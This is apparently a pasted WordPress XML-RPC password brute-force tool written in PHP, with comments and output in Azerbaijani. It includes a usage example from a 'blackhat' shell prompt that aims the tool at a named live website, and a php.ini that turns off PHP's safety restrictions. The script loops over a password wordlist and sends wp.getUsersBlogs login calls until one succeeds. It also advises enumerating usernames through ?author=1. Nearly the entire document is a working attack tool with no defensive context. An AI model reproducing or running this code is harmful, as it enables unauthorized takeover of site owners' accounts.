wordpress xmlrpc bruteforce

1. Usage:
2. [blackhat@fedora tmp]$ php -c ~/shellz/xmlrpcbrutewp/php.ini -f /tmp/brut.php admin /home/blackhat/Desktop/founds/1.txt http://verona.am/xmlrpc.php
3.  
4. $ cat ~/shellz/xmlrpcbrutewp/php.ini
5. safe_mode = off
6. open_basedir=
7. disable_functions=
8.  
9.  
10.  
11. [blackhat@fedora ~]$ cat /tmp/brut.php
12. <?php
13. /*
14.  
15. Wordpress xmlrpc Bruteforce tool
16. Coded by AkaStep
17. */
18.  
19. error_reporting(0);
20. ini_set('memory_limit', '6000M');
21. set_time_limit(0);
22.  
23. $usage='php -f script.php username luget.txt http://domain.adi/xmlrpc.php';
24. $banner=chr(27) ."[42m" . str_repeat('#',60) . PHP_EOL . ' **************** WORDPRESS XMLRPC BRUTEFORCE TOOL **************' . PHP_EOL .
25. ' ********************* Istifade qaydasi ********************'.
26. PHP_EOL .$usage . PHP_EOL .
27. ' ****************************************************'. PHP_EOL .
28. 'Hint: VALID ISTIFADECI ADI: http://domain.adi/?author=1 GRAB ET ' . chr(27) . "[0m" .PHP_EOL ;
29.  
30. $uname=$argv[1];
31.  
32. $luget=$argv[2];
33.  
34. $hedef=$argv[3];
35.  
36. if(count($argv) < 4){ die(PHP_EOL . $banner . PHP_EOL);}
37.  
38. echo $banner;
39.  
40. $luget=file($luget) or die('Luget Fayli Aca bilmirem!');
41.  
42.  
43. $i=NULL;
44. foreach($luget as $pass)
45. {
46.  
47. $i++;
48.  
49. $ch = curl_init();
50. $curlConfig = array(
51. CURLOPT_URL => $hedef,
52. CURLOPT_POST => true,
53. CURLOPT_RETURNTRANSFER => true,
54. CURLOPT_TIMEOUT => 5,
55. CURLOPT_USERAGENT => 'MSIE 8 GECKO 9 BRUTEFORCE TRY MOZILLA GECKO BLAH LINUX PENTEST',
56. CURLOPT_POSTFIELDS => '<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>
57. <string>' . $uname . '</string></value></param>
58. <param><value><string>' . $pass . '</string></value></param></params>
59. </methodCall>');
60.  
61.  
62. curl_setopt_array($ch, $curlConfig);
63. $result = curl_exec($ch);
64.  
65. $massiv=explode(PHP_EOL,$result);
66.  
67. $result0=str_ireplace(array('<value><string>',
68. '</string></value>'),'',(string)$massiv[11]);
69.  
70.  
71. //echo var_dump($massiv);
72.  
73.  
74.  
75. if($i % 10==1) {
76.  
77. echo chr(27) . "[43m" . ' HEDEF => ' . preg_replace('/[^A-Za-z0-9\.\\:\\/]/i','',(string)$hedef). chr(27) . "[0m" .PHP_EOL;
78. }
79.  
80.  
81. if(!stristr($result,'Incorrect username or password')) die(PHP_EOL .chr(27) . "[42m" . '=======> TAPILDI! Username: ' . $uname . ' PAROL => ' . $pass . ' ==> Saytdan cavab:[ ' .
82. preg_replace('/[^A-Za-z]/i','',str_ireplace(array('<member><name>',
83. '</name>','<value><boolean>','</boolean></value></member>'),'',(string)$massiv[7])) . ' ] ' . ' <======= ' . PHP_EOL . 'HEDEF: ' . $hedef. chr(27) . "[0m" .PHP_EOL);
84.  
85.  
86. echo chr(27) . "[41m" . '[ ' . $i . ' ] USERNAME: ' . $uname . ' PAROL QISMINDE: ' . trim($pass) . ' ==> Saytdan cavab:[ ' . trim($result0) . ' ] ' . chr(27) . "[0m" . PHP_EOL ;
87.  
88.  
89. curl_close($ch);
90.  
91. }
92.  
93. unset($pass);
94.  
95.  
96.  
97. ?>